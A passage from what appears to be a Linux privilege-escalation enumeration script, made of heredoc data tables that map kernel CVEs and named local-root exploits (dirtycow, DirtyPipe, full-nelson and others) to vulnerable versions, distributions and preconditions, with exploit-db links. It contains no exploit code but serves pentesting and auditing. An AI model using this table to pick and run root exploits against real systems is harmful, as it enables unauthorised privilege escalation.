CVE-2009-2698 hoagie_udp_sendmsg pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86 debian=4 1 Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 1215 CVE-2009-2698 katon (udp_sendmsg) pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86 debian=4 1 Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 1216 CVE-2009-2698 ip_append_data pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86 fedora=4|5|6,RHEL=4 1 Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 1217 CVE-2009-3547 pipe.c 1 pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31 1 1218 CVE-2009-3547 pipe.c 2 pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31 1 1219 EOF_DATA_1 1220 )" 1221 KERNEL_CVE_DATA_2="$(cat <<'EOF_DATA_2' 1222 CVE-2009-3547 pipe.c 3 pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31 1 1223 CVE-2010-3301 ptrace_kmod2 pkg=linux-kernel,ver>=2.6.26,ver<=2.6.34 debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server} 1 1224 CVE-2010-1146 reiserfs pkg=linux-kernel,ver>=2.6.18,ver<=2.6.34 ubuntu=9.10 1 1225 CVE-2010-2959 can_bcm pkg=linux-kernel,ver>=2.6.18,ver<=2.6.36 ubuntu=10.04{kernel:2.6.32-24-generic} 1 1226 CVE-2010-3904 rds pkg=linux-kernel,ver>=2.6.30,ver<2.6.37 debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic} 1 1227 CVE-2010-3848,CVE-2010-3850,CVE-2010-4073 half_nelson pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36 ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server} 1 1228 N/A caps_to_root pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36,x86 ubuntu=10.10 1 1229 N/A caps_to_root 2 pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36 ubuntu=10.10 1 1230 CVE-2010-4347 american-sign-language pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36 1 1231 CVE-2010-3437 pktcdvd pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36 ubuntu=10.04 1 1232 CVE-2010-3081 video4linux pkg=linux-kernel,ver>=2.6.0,ver<=2.6.33 RHEL=5 1 1233 CVE-2012-0056 memodipper pkg=linux-kernel,ver>=3.0.0,ver<=3.1.0 ubuntu=(10.04|11.10){kernel:3.0.0-12-(generic|server)} 1 1234 CVE-2012-0056,CVE-2010-3849,CVE-2010-3850 full-nelson pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36 ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server} 1 1235 CVE-2013-1858 CLONE_NEWUSER|CLONE_FS pkg=linux-kernel,ver=3.8,CONFIG_USER_NS=y 1 CONFIG_USER_NS needs to be enabled 1236 CVE-2013-2094 perf_swevent pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64 RHEL=6,ubuntu=12.04{kernel:3.2.0-(23|29)-generic},fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64} 1 No SMEP/SMAP bypass 1237 CVE-2013-2094 perf_swevent 2 pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64 ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} 1 No SMEP/SMAP bypass 1238 CVE-2013-0268 msr pkg=linux-kernel,ver>=2.6.18,ver<3.7.6 1 1239 CVE-2013-1959 userns_root_sploit pkg=linux-kernel,ver>=3.0.1,ver<3.8.9 1 1240 CVE-2013-2094 semtex pkg=linux-kernel,ver>=2.6.32,ver<3.8.9 RHEL=6 1 1241 CVE-2014-0038 timeoutpwn pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y ubuntu=13.10 1 CONFIG_X86_X32 needs to be enabled 1242 CVE-2014-0038 timeoutpwn 2 pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y ubuntu=(13.04|13.10){kernel:3.(8|11).0-(12|15|19)-generic} 1 CONFIG_X86_X32 needs to be enabled 1243 CVE-2014-0196 rawmodePTY pkg=linux-kernel,ver>=2.6.31,ver<=3.14.3 1 1244 CVE-2014-2851 use-after-free in ping_init_sock() (DoS) pkg=linux-kernel,ver>=3.0.1,ver<=3.14 0 1245 CVE-2014-4014 inode_capable pkg=linux-kernel,ver>=3.0.1,ver<=3.13 ubuntu=12.04 1 1246 CVE-2014-4699 ptrace/sysret pkg=linux-kernel,ver>=3.0.1,ver<=3.8 ubuntu=12.04 1 1247 EOF_DATA_2 1248 )" 1249 KERNEL_CVE_DATA_3="$(cat <<'EOF_DATA_3' 1250 CVE-2014-4943 PPPoL2TP (DoS) pkg=linux-kernel,ver>=3.2,ver<=3.15.6 1 1251 CVE-2014-5207 fuse_suid pkg=linux-kernel,ver>=3.0.1,ver<=3.16.1 1 1252 CVE-2015-9322 BadIRET pkg=linux-kernel,ver>=3.0.1,ver<3.17.5,x86_64 RHEL<=7,fedora=20 1 1253 CVE-2015-3290 espfix64_NMI pkg=linux-kernel,ver>=3.13,ver<4.1.6,x86_64 1 1254 N/A bluetooth pkg=linux-kernel,ver<=2.6.11 1 1255 CVE-2015-1328 overlayfs pkg=linux-kernel,ver>=3.13.0,ver<=3.19.0 ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic} 1 1256 CVE-2015-8660 overlayfs (ovl_setattr) pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3 1 1257 CVE-2015-8660 overlayfs (ovl_setattr) pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3 ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic} 1 1258 CVE-2016-0728 keyring pkg=linux-kernel,ver>=3.10,ver<4.4.1 0 Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working 1259 CVE-2016-2384 usb-midi pkg=linux-kernel,ver>=3.0.0,ver<=4.4.8 ubuntu=14.04,fedora=22 1 Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user 1260 CVE-2016-4997 target_offset pkg=linux-kernel,ver>=4.4.0,ver<=4.4.0,cmd:grep -qi ip_tables /proc/modules ubuntu=16.04{kernel:4.4.0-21-generic} 1 ip_tables.ko needs to be loaded 1261 CVE-2016-4557 double-fdput() pkg=linux-kernel,ver>=4.4,ver<4.5.5,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 ubuntu=16.04{kernel:4.4.0-21-generic} 1 CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 1262 CVE-2016-5195 dirtycow pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3 debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04 4 For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh 1263 CVE-2016-5195 dirtycow 2 pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3 debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} 4 For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh 1264 CVE-2016-8655 chocobo_root pkg=linux-kernel,ver>=4.4.0,ver<4.9,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} 1 CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled 1265 CVE-2016-9793 SO_{SND|RCV}BUFFORCE pkg=linux-kernel,ver>=3.11,ver<4.8.14,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 1 CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only 1266 CVE-2017-6074 dccp pkg=linux-kernel,ver>=2.6.18,ver<=4.9.11,CONFIG_IP_DCCP=[my] ubuntu=(14.04|16.04){kernel:4.4.0-62-generic} 1 Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass 1267 CVE-2017-7308 af_packet pkg=linux-kernel,ver>=3.2,ver<=4.10.6,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic} 1 CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels 1268 CVE-2017-16995 eBPF_verifier pkg=linux-kernel,ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic} 5 CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 1269 CVE-2017-1000112 NETIF_F_UFO pkg=linux-kernel,ver>=4.4,ver<=4.13,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*} 1 CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels 1270 CVE-2017-1000253 PIE_stack_corruption pkg=linux-kernel,ver>=3.2,ver<=4.13,x86_64 RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1} 1 1271 CVE-2018-5333 rds_atomic_free_op NULL pointer dereference pkg=linux-kernel,ver>=4.4,ver<=4.14.13,cmd:grep -qi rds /proc/modules,x86_64 ubuntu=16.04{kernel:4.4.0|4.8.0} 1 rds.ko kernel module needs to be loaded. Modified version at 'ext-url' adds support for additional targets and bypassing KASLR. 1272 CVE-2018-14634 Mutagen Astronomy pkg=linux-kernel,x86_64,ver>=4.14.1,ver<=4.14.54 debian=8,RHEL=6|7 1 systems with less than 32GB of RAM are unlikely to be affected by this issue 1273 CVE-2018-18955 subuid_shell pkg=linux-kernel,ver>=4.15,ver<=4.19.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,cmd:[ -u /usr/bin/newuidmap ],cmd:[ -u /usr/bin/newgidmap ] ubuntu=18.04{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28} 1 CONFIG_USER_NS needs to be enabled 1274 CVE-2019-13272 PTRACE_TRACEME pkg=linux-kernel,ver>=4,ver<5.1.17,sysctl:kernel.yama.ptrace_scope==0,x86_64 ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*} 1 Requires an active PolKit agent. 1275 EOF_DATA_3 1276 )" 1277 KERNEL_CVE_DATA_4="$(cat <<'EOF_DATA_4' 1278 CVE-2019-15666 XFRM_UAF pkg=linux-kernel,ver>=3,ver<5.0.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,CONFIG_XFRM=y 1 CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled 1279 CVE-2021-27365 linux-iscsi pkg=linux-kernel,ver<=5.11.3,CONFIG_SLAB_FREELIST_HARDENED!=y RHEL=8 1 CONFIG_SLAB_FREELIST_HARDENED must not be enabled 1280 CVE-2021-3490 eBPF ALU32 bounds tracking for bitwise ops pkg=linux-kernel,ver>=5.7,ver<5.12,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*} 5 CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 1281 CVE-2021-3493 Ubuntu OverlayFS pkg=linux-kernel,ver>=3.13,ver<5.14,x86_64 ubuntu=(14.04|16.04|18.04|20.04|20.10) 1 Only Ubuntu is affected. 1282 CVE-2021-22555 Netfilter heap out-of-bounds write pkg=linux-kernel,ver>=2.6.19,ver<=5.12-rc6 ubuntu=20.04{kernel:5.8.0-*} 1 ip_tables kernel module must be loaded 1283 CVE-2022-0847 DirtyPipe pkg=linux-kernel,ver>=5.8,ver<=5.16.11 ubuntu=(20.04|21.04),debian=11 1 1284 CVE-2022-0995 watch_queue pkg=linux-kernel,ver>=5.8,ver<5.16.5,x86_64 ubuntu=21.10{kernel:5.13.0.37-generic} 1 Not 100% reliable, may need to be run a couple of times. It rare cases it may panic the kernel. 1285 CVE-2022-2586 nft_object UAF pkg=linux-kernel,ver>=5.12,ver<5.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 ubuntu=(20.04){kernel:5.12.13} 1 kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) 1286 CVE-2022-32250 nft_object UAF (NFT_MSG_NEWSET) pkg=linux-kernel,ver<5.18.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 ubuntu=(22.04){kernel:5.15.0-27-generic} 1 kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) 1287 CVE-2023-0386 OverlayFS suid smuggle pkg=linux-kernel,ver>=5.11,ver<=6.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 ubuntu=22.04.1{kernel:5.15.0-57-generic} 1 CONFIG_USER_NS needs to be enabled && kernel.unprivileged_userns_clone=1 required 1288 CVE-2024-1086 double-free in nf_tables pkg=linux-kernel,x86_64,ver>=5.14,ver<=6.6,CONFIG_NF_TABLES=y,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 debian=12,ubuntu=22.04 1 CONFIG_USER_NS and CONFIG_NF_TABLES need to be enabled && kernel.unprivileged_userns_clone=1 required 1289 CVE-2021-3560 Polkit race authentication bypass cmd:sh -c "apt list --installed 2>/dev/null | grep -E 'polkit.*0\\.105-26' | grep -qEv 'ubuntu1\\.[1-9]' || yum list installed 2>/dev/null | grep -qE 'polkit.*\\(0\\.117-2\\|0\\.115-6\\|0\\.11[3-9]\\)' || rpm -qa 2>/dev/null | grep -qE 'polkit.*\\(0\\.117-2\\|0\\.115-6\\|0\\.11[3-9]\\)'" 1 Migrated from former standalone 1_system_information check 1290 CVE-2025-38352 POSIX CPU timers race pkg=linux-kernel,ver>=6.12,ver<6.12.34,CONFIG_POSIX_CPU_TIMERS_TASK_WORK!=y 1 Migrated from former standalone 1_system_information check 1291 af_packet 2016-8655 4.4.0 http://www.exploit-db.com/exploits/40871 1292 american-sign-language 2010-4347 2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 http://www.securityfocus.com/bid/45408 1293 ave 2.4.19,2.4.20 1294 brk 2.4.10,2.4.18,2.4.19,2.4.20,2.4.21,2.4.22 1295 can_bcm 2010-2959 2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 http://www.exploit-db.com/exploits/14814 1296 caps_to_root n/a 2.6.34,2.6.35,2.6.36 http://www.exploit-db.com/exploits/15916 1297 clone_newuser N\A 3.3.5,3.3.4,3.3.2,3.2.13,3.2.9,3.2.1,3.1.8,3.0.5,3.0.4,3.0.2,3.0.1,3.2,3.0.1,3.0 http://www.exploit-db.com/exploits/38390 1298 dirty_cow 2016-5195 2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.5.0,3.6.0,3.7.0,3.7.6,3.8.0,3.9.0 http://www.exploit-db.com/exploits/40616 1299 CVE-2010-0415 do_pages_move 2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31 sieve 1 Spenders Enlightenment 1300 elfcd 2.6.12 1301 elfdump 2.4.27 1302 EOF_DATA_4 1303 )" 1304 KERNEL_CVE_DATA_5="$(cat <<'EOF_DATA_5' 1305 elflbl 2.4.29 http://www.exploit-db.com/exploits/744 1306 exit_notify 2.6.25,2.6.26,2.6.27,2.6.28,2.6.29 http://www.exploit-db.com/exploits/8369 1307 exp.sh 2.6.9,2.6.10,2.6.16,2.6.13 1308 expand_stack 2.4.29 1309 CVE-2018-14665 exploit_x 2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.5.0,3.6.0,3.7.0,3.7.6,3.8.0,3.9.0,3.10.0,3.11.0,3.12.0,3.13.0,3.14.0,3.15.0,3.16.0,3.17.0,3.18.0,3.19.0,4.0.0,4.1.0,4.2.0,4.3.0,4.4.0,4.5.0,4.6.0,4.7.0 1 http://www.exploit-db.com/exploits/45697 1310 ftrex 2008-4210 2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22 http://www.exploit-db.com/exploits/6851 1311 CVE-2017-16695 get_rekt 4.4.0,4.8.0,4.10.0,4.13.0 1 http://www.exploit-db.com/exploits/45010 1312 h00lyshit 2006-3626 2.6.8,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16 http://www.exploit-db.com/exploits/2013 1313 half_nelson1 2010-3848 2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 econet http://www.exploit-db.com/exploits/17787 1314 half_nelson2 2010-3850 2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 econet http://www.exploit-db.com/exploits/17787 1315 half_nelson3 2010-4073 2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 econet http://www.exploit-db.com/exploits/17787 1316 kdump 2.6.13 1317 km2 2.4.18,2.4.22 1318 krad 2.6.5,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11 1319 krad3 2.6.5,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11 http://exploit-db.com/exploits/1397 1320 local26 2.6.13 1321 loginx 2.4.22 1322 loko 2.4.22,2.4.23,2.4.24 1323 memodipper 2012-0056 2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0 http://www.exploit-db.com/exploits/18411 1324 mremap_pte 2.4.20,2.2.24,2.4.25,2.4.26,2.4.27 http://www.exploit-db.com/exploits/160 1325 msr 2013-0268 2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.5.0,3.6.0,3.7.0,3.7.6 http://www.exploit-db.com/exploits/27297 1326 newlocal 2.4.17,2.4.19 1327 newsmp 2.6 1328 ong_bak 2.6.5 1329 overlayfs 2015-8660 3.13.0,3.16.0,3.19.0 http://www.exploit-db.com/exploits/39230 1330 EOF_DATA_5 1331 )" 1332 KERNEL_CVE_DATA_6="$(cat <<'EOF_DATA_6' 1333 packet_set_ring 2017-7308 4.8.0 http://www.exploit-db.com/exploits/41994 1334 perf_swevent 2013-2094 3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.4.1,3.4.2,3.4.3,3.4.4,3.4.5,3.4.6,3.4.8,3.4.9,3.5.0,3.6.0,3.7.0,3.8.0,3.8.1,3.8.2,3.8.3,3.8.4,3.8.5,3.8.6,3.8.7,3.8.8,3.8.9 http://www.exploit-db.com/exploits/26131 1335 pipe.c_32bit 2009-3547 2.4.4,2.4.5,2.4.6,2.4.7,2.4.8,2.4.9,2.4.10,2.4.11,2.4.12,2.4.13,2.4.14,2.4.15,2.4.16,2.4.17,2.4.18,2.4.19,2.4.20,2.4.21,2.4.22,2.4.23,2.4.24,2.4.25,2.4.26,2.4.27,2.4.28,2.4.29,2.4.30,2.4.31,2.4.32,2.4.33,2.4.34,2.4.35,2.4.36,2.4.37,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31 http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c 1336 pktcdvd 2010-3437 2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 http://www.exploit-db.com/exploits/15150 1337 pp_key 2016-0728 3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.1,3.8.2,3.8.3,3.8.4,3.8.5,3.8.6,3.8.7,3.8.8,3.8.9,3.9.0,3.9.6,3.10.0,3.10.6,3.11.0,3.12.0,3.13.0,3.13.1 http://www.exploit-db.com/exploits/39277 1338 prctl 2.6.13,2.6.14,2.6.15,2.6.16,2.6.17 http://www.exploit-db.com/exploits/2004 1339 prctl2 2.6.13,2.6.14,2.6.15,2.6.16,2.6.17 http://www.exploit-db.com/exploits/2005 1340 prctl3 2.6.13,2.6.14,2.6.15,2.6.16,2.6.17 http://www.exploit-db.com/exploits/2006 1341 prctl4 2.6.13,2.6.14,2.6.15,2.6.16,2.6.17 http://www.exploit-db.com/exploits/2011 1342 ptrace 2.4.18,2.4.19,2.4.20,2.4.21,2.4.22 1343 ptrace24 2.4.9 1344 CVE-2007-4573 ptrace_kmod 2.4.18,2.4.19,2.4.20,2.4.21,2.4.22 1 1345 ptrace_kmod2 2010-3301 2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34 ia32syscall,robert_you_suck http://www.exploit-db.com/exploits/15023 1346 pwned 2.6.11 1347 py2 2.6.9,2.6.17,2.6.15,2.6.13 1348 raptor_prctl 2006-2451 2.6.13,2.6.14,2.6.15,2.6.16,2.6.17 http://www.exploit-db.com/exploits/2031 1349 rawmodePTY 2014-0196 2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.14.0,3.15.0 http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c 1350 rds 2010-3904 2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 http://www.exploit-db.com/exploits/15285 1351 reiserfs 2010-1146 2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34 http://www.exploit-db.com/exploits/12130 1352 remap 2.4 1353 rip 2.2 1354 CVE-2008-4113 sctp 2.6.26 1 1355 semtex 2013-2094 2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0 http://www.exploit-db.com/exploits/25444 1356 smpracer 2.4.29 1357 sock_sendpage 2009-2692 2.4.4,2.4.5,2.4.6,2.4.7,2.4.8,2.4.9,2.4.10,2.4.11,2.4.12,2.4.13,2.4.14,2.4.15,2.4.16,2.4.17,2.4.18,2.4.19,2.4.20,2.4.21,2.4.22,2.4.23,2.4.24,2.4.25,2.4.26,2.4.27,2.4.28,2.4.29,2.4.30,2.4.31,2.4.32,2.4.33,2.4.34,2.4.35,2.4.36,2.4.37,2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30 wunderbar_emporium http://www.exploit-db.com/exploits/9435 1358 EOF_DATA_6 1359 )" 1360 KERNEL_CVE_DATA_7="$(cat <<'EOF_DATA_7' 1361 sock_sendpage2 2009-2692 2.4.4,2.4.5,2.4.6,2.4.7,2.4.8,2.4.9,2.4.10,2.4.11,2.4.12,2.4.13,2.4.14,2.4.15,2.4.16,2.4.17,2.4.18,2.4.19,2.4.20,2.4.21,2.4.22,2.4.23,2.4.24,2.4.25,2.4.26,2.4.27,2.4.28,2.4.29,2.4.30,2.4.31,2.4.32,2.4.33,2.4.34,2.4.35,2.4.36,2.4.37,2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30 proto_ops http://www.exploit-db.com/exploits/9436 1362 stackgrow2 2.4.29,2.6.10 1363 timeoutpwn 2014-0038 3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.9,3.9.0,3.10.0,3.11.0,3.12.0,3.13.0,3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.5,3.8.6,3.8.9,3.9.0,3.9.6,3.10.0,3.10.6,3.11.0,3.12.0,3.13.0,3.13.1 http://www.exploit-db.com/exploits/31346 1364 CVE-2009-1185 udev 2.6.25,2.6.26,2.6.27,2.6.28,2.6.29 udev <1.4.1 1 http://www.exploit-db.com/exploits/8478 1365 udp_sendmsg_32bit 2009-2698 2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19 http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c 1366 uselib24 2.6.10,2.4.17,2.4.22,2.4.25,2.4.27,2.4.29 1367 CVE-2009-1046 vconsole 2.6 1 1368 video4linux 2010-3081 2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33 